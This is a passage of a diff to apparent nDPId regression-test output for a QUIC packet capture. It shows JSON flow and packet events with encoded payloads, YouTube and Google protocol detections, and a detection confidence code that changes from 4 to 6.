AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 02254{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1463060980460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980460,"pkt":"eJKcD6iO8IQvSpdgCABFAAVifaoAADIRmLPYOtLhwKgBaQG70jkFThU9AAFbOkhXLI3U967KCL3cJUfMqLc5FSrY4cYs3xypa7qHkPMQkfyihNqC28UhBOL3e\/5TBI7YTG0J23OmdlC7GgmCbVWFBre3mnIHOH5gNl6B4pV+JLE9LheDJBWLfps\/P5l5aMhy6p4xkqOtVn+84yrn69vnIGngY2UUctisj\/\/7qbGHoU7KjFVZvLiLnesCjZPEQ9bmtTdxJ8NIoohV99NBrL3ZR\/mRKqFg6ck1jjGMancWDX9uCodwuw+nFeiwhdNiUXqpCyb8WsgjNJlQgx5Jzfa6dxFwnJS2EsJzy1jow479DEUJQyupcHux9LBb4IxdT8f537ef70Ew4CvWu3Iba3a+sRfT8oSLt0CF8xrbGmeBEnSqbecBn6F2MYjUF2gtYKqmlv2GpssQgCf+y1IgiyKvJBAFYATvIM5Yoz\/5ASrdVp19my0ed8fkjXD\/9hI6BqGDwauf0bTx1RLAMhLrvl6pXAmkTiy9XjRAKtxJq+C1D4UKHSSI2+YjymrUAqCH3KRAZmA0Bxs3bF5O\/PSuozCEiM1fA6uKcRzdnnQiYy07+fjPtlVxQByhag2n\/cAPz+kuIj8MMSN1yDveDuOdF8jXFe5s9mrKD8JMfRZctDC3tl6y0RDe95cUiGF72q+hrAL\/PnaEp3C0gWLN0HrD0R9JOOxmp7Auh7povQU79kvL0xqyh4jnZ\/Eauv5xfJJ9WERDrqx3CTTuciqZlam2PDCCuo1MW4zttYvjA3nx3zF4aGwysEzvVFN3YL6hVQjdDA4G9W2+Ef0aVvJ6dwImjNYp4R0XlWhoyOCtNc6n9KHJ2lGiAOWbtoy+eIkUgerfolxpj29D8pTuvRSA6xSdgniEhkWz2S88FBK7lsS9dfKhGidfIxn3mpcstFKBaupKzVmBUCAqw1Z9aWdecUTnIY67owXaqxfverdyb0S4+uAKmDm4p8KZN+VbJFG\/ylg0sBWP80mInpEbGS7MrNOzG+nWmwobpNpDfkH6k4MJahEdbTJwc8F0zwrc9OBje09p8uO+iXNyZJSmFPRBYsNZ4SG8aHlZEWwk1zN++dYeWoX+nUUYJD4SmFHSyUSfF3Ib+mhP8VYivL+Z49LFaGNAB7KGxHv6fvGdSutX9bFiP1ZkAEhpweNPt8+O3nQTWj927mHvqPFEoMfTdYknC6NXf1NUkjL0SCHGhtXTgom7sP8gds1oLZBN2H5EejX\/eUCiWr6Vz0O2ty3vLiEaKe45R6dpcVbZGDcZnogU1oKhCd5eIW5VCS9ZoxdQUXYVQ5OVZmD0+lXGLDhaxED1Sg0QBEID7Gyk3XlpIelSpdCcj7XZyy+fDz5peeAIHd7A\/NT1xszFkW3dJpaVelwRfVQ2Tajy6IY3aeRniays5OlSdDEGtZvz+UGoOACWTNtx+Bck5uH4c3U2F4B+CPTc7F0hvJL623HEU79LiEo5zzmsjK4jgrRtPE6Ujm4ZpuNfqh8tPnhC9+Bi2Aja+3eezVsTpRflcLiQs0+wiUrXwIMtQYHLDjHEkGkWCaZ1nNn1+gwpcra6WAb6OHVPMNzrYJK0SrAHU0\/USbaXPZLFNMj2alWPs47VfDow3\/W3uXsLSYKoanH+Y+vNHJPIWjV0xMRUN6pTJE7IVb0BTnZ7b0D3Y4\/SxaKloeNxIuesxRvodNcMI\/1buC5kqkJStpYaf7KVkJyh1GHdI8GrmxoF2MSLqGY6lT0vPgbFD4MZreGOa5Sssczsczl+luw+iYguWV7SHDSmHfZxeBgkr589fC51KvvuWXNd3GZS5QlUqIxlrJRMHt8X"} -00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1461850699450,"flow_last_seen":1461850703450,"flow_idle_time":200000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6820,"flow_avg_l4_payload_len":1136,"midstream":0,"thread_ts_msec":1463060980460,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1461850699450,"flow_last_seen":1461850703450,"flow_idle_time":200000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6820,"flow_avg_l4_payload_len":1136,"midstream":0,"thread_ts_msec":1463060980460,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","packets-captured":450,"packets-processed":449,"total-skipped-flows":0,"total-l4-payload-len":271275,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":9,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":50,"global_ts_msec":1463075953299} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463075953299,"flow_last_seen":1463075953299,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02241{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1463075953299,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463075953299,"pkt":"6HTmLPTkABlmWmaMCABFAAViaTtAAEARXzHAqAFt2DrSzomkAbsFTpsFDby767UFbXetUTAzMAEh5i93uTUS22zwlS0AoAEABENITE8aAAAAUEFEAEYBAABTTkkAVQEAAFNUSwCPAQAAVkVSAJMBAABDQ1MAowEAAE5PTkPDAQAATVNQQ8cBAABBRUFEywEAAFVBSUTsAQAAU0NJRPwBAABUQ0lEAAIAAFBETUQEAgAAU1JCRggCAABJQ1NMDAIAAE5PTlAsAgAAUFVCU0wCAABTQ0xTUAIAAEtFWFNUAgAAWExDVFwCAABDU0NUXAIAAENPUFRgAgAAQ0NSVHgCAABJUlRUfAIAAENFVFYgAwAAQ0ZDVyQDAABTRkNXKAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0td3d3LnlvdXR1YmUuY29teFwziXjGfp0+iLiPa5NFRFyqDFkuaiall82sYIzujJV2eEmSxVGrXgdwnEo24jy3PXEgwhIODsHz2lEwMzB7Junn5Fxx\/wHogWCSkhroVzTEcXji0toaKKW2C\/sjLL4Hx\/uc6Fh9FqIQ4mtE7XBkAAAAQ0MyMENocm9tZS81MC4wLjI2NjEuMTAyIExpbnV4IHg4Nl82NO4xNazIxw51CPh92NozyjEAAAAAWDUwOQAAEAAeAAAAV2LXIh+dp84WNbuB7eLfYt7CEN3uuVCwsaMPVZLZkwAcWv3ewLeWKh8oWp+ADGqv7hr4e6BITFL34pf63u8lTgEAAABDMjU1Ve9eTSHF9WVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrQX4AAJnDlbsORKBU4xOKlwWO9P4E5XFal5z7hzqpwhe\/gMX+Blclu+PZJjQ25zzFRxooIRN4BrBfLQmDdxaJYtqVNyhOzgBZdHzyh0tqgzeC9Fkja7K8HfjiuAyeK8FHD1egJgrMDFGpXlhTM816keOEywC8bzRfESJQUt0PZFKBRrh3m2XPL+hfh5e34YbH0wkaQLc6HM0z36TboZSwOAF93TLAofZgAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463075953299,"flow_last_seen":1463075953299,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/50.0.2661.102 Linux x86_64"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463075953299,"flow_last_seen":1463075953299,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/50.0.2661.102 Linux x86_64"}} 00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1463075953300,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1463075953300,"pkt":"6HTmLPTkABlmWmaMCABFAAF1aTxAAEARYx3AqAFt2DrSzomkAbsBYbFkDby767UFbXetUTAzMAIyT2zFCwKRbjpW5pKGcwa\/zOYtI4ibM\/DXTo+3hM8QHjQop2VE57N\/4px1Dr2rh1Of6fuprsXKXOLDTQHDMOztLE0ibzNUs5cviwMINA8HUKs1w\/8wSCAJg+c5E0s64vzHKdQ5N4AY1I+whZj+YXv7QX9bQtyBCP0WJRsK41puLJyY\/5rYf1WXDzsnCxRRei33WDvMsb+MNKppe2kXK4Q1DqzsKviobjh+ZnTmMaJFKxfjljXwNv0dsW2Nhjh9NEpVNdRUHHe+L\/umz5nJPSc8m3xsZrs27PfAfYs3O4DQT7zrN+rUD1tvAlM6ojpuYBXQUKIqFg6jkPkLtz0lnT5ofUC3bxq1J8gFqtExK3aj\/kH0as9Y1tYZiRMdgBmqLNq1Ru6unJsdETbKAQha1+Pgo4qtxiVVhohC7TEjAQj3UwwRrwKowX6bUvpY"} 02251{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1463075953334,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463075953334,"pkt":"ABlmWmaM6HTmLPTkCABFAAViGxkAADQR+VPYOtLOwKgBbQG7iaQFTgWwDLy767UFbXetARhGCjp5JYP2NRSCDQGAAVJFSgAHAAAAU1RLADwAAABTTk8AdAAAAFBST0a7AAAAU0NGR04BAABSUkVKUgEAAENTQ1RGAgAAQ1JU\/xIGAAAt19AYB5aaMKurHRM81LpDG06F1\/HgjIAXnLSYHoaRDG+YCx4gYrs3k43pE\/W5utsyegd0CLIV4fasqoZkRpVLMtnpS+sIRqrbfvgjIL2IUeZTlSGu\/7+bU4Z+Ij1vgEEcToZ\/00OYAYgC+05liNl+ov97hTBFAiBs6kS1HuLjC8x7gQEfBCOAowmjvDZU885lgtcWaGEy0QIhAPm+1mJq5QK6WHRPaEUwOfyND\/8ufeGnt66391Aj9lqnU0NGRwcAAABBRUFECAAAAFNDSUQYAAAAUERNRBwAAABQVUJTPwAAAEtFWFNDAAAAT0JJVEsAAABFWFBZUwAAAEFFU0dDQzIwWGClOjtYNIHfmiHJ0bGFX0NISUQgAACup8alaVf8gP6KOzle5pjmXvoOKgb+N2LRgB5dcX8Ka0MyNTUSxc3dEjis6kATN1cAAAAADQAAAADyAHcA7ku9t3XOYLrhQmkfq+GeZqMPfl+wctiDAMR7iXqo\/csAAAFUe1HMJwAABAMASDBGAiEAqHfzHEY9KN1QjXeaiZlcHt6ybhyDsnLIoo6e82Zg73ACIQCveMl0OwuTrVY5LqDcb5TIihLD6ZAJQlUDU68E5\/BK6AB3AN3rHSt6DU+mIIuBrYFocH4ujp0B1VyIjT0RxM227L7MAAABVHtRyfMAAAQDAEgwRgIhAMWc6riI2T4lmoQuPyvTrFTQuoCnh6VaWJBNwHgCZloKAiEAiHJhhSnJcrUXaDEZQLClSBLKToA3CEOVFu+IPvrOhh4BAwHogWCSkhroAwAAAAN7Junn5Fxx\/wAAAAAA\/wYAAHi7c1AtxPvNxgAsudi+GzSx3oe04Tic2NatWf922kf0hhwVG1mgwsAMmIdMgPkF1p4zMDcyN7AwtgR1otKwWsXBw+UMTDdp+UV5mYmwBMnOw+ubX5pXAkpdYZmp5XB38SC7S9RAGOwuHh4tYJiChMGRGwkUZgf68ZwtsPnBAWYwM7IzOzGwvF91fdMNT2Ud1a7MlSledVlybaZOW\/IT25eYrq8qUp7OLmq33YHB9tcRfpb4rOn2rfYyM5bOl9xpdepuGi\/LiYsHpi9uYuk3aGLpJlSANTGD+wiCLE3MrkCOYxOKA5t4tfQS81KK8jPBDZ4mMSC3oCA1Lz0zLxVZmZCWXnJOfmkKspgYzCDdxLzEnMqSzORisDg3woJEZE5OEx+S1XqZeaj8rAJUfml2Ez+yU\/USi9AFStEEktBVJOejCeRWoAmUoGspy0Nyc0oqEie1GImTVoTEyShF4mSWIHHycpA4BSicElCgQjiJKcAiABJ4cMdARPKaRGACQNncVGCLAqxMECZalpmSmg8WAsVrcQmwYEwGaeNF4gEluYDcshJDJLYRmA00PTe1pAioClk10Chg2yUjE1xANQmAeDloMV+ZX1pSmpSqm5efnJ+fnQlPTFBxNGWpKaWQKhyWQICpJTcdzJGCJ7+czNS8kmJke7iRkyYLSH0TG1Aa2MZpEsGa9LiQkyyWYONC8hYXuGiGmMYBdqdeEjC6kT0ggs35SA0q9gaDDKRiOQZYsGgjFbjy0DKwIDsTyVf67p6O7kbgElUbqQyHKYYGgyGyDlC5jtTI273NV8E2Yd+C1ye2dnFOb2eeVW6ug9bQQS6rsfaMFCEtB2DVhdYd4WBjS2\/kARbTBgaQ"} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1463060980356,"flow_last_seen":1463060980457,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5477,"flow_avg_l4_payload_len":912,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1463060980356,"flow_last_seen":1463060980457,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5477,"flow_avg_l4_payload_len":912,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463060980313,"flow_last_seen":1463060980404,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.3","src_port":40461,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463060980313,"flow_last_seen":1463060980404,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.3","src_port":40461,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1463060980349,"flow_last_seen":1463060980446,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":912,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1463060980336,"flow_last_seen":1463060980436,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6251,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1463060980301,"flow_last_seen":1463060980460,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4124,"flow_avg_l4_payload_len":824,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1463075953299,"flow_last_seen":1463075954300,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":55535,"flow_avg_l4_payload_len":804,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463060980378,"flow_last_seen":1463060980460,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1463060980364,"flow_last_seen":1463060980449,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1463060980349,"flow_last_seen":1463060980446,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":912,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1463060980336,"flow_last_seen":1463060980436,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6251,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1463060980301,"flow_last_seen":1463060980460,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4124,"flow_avg_l4_payload_len":824,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1463075953299,"flow_last_seen":1463075954300,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":55535,"flow_avg_l4_payload_len":804,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463060980378,"flow_last_seen":1463060980460,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 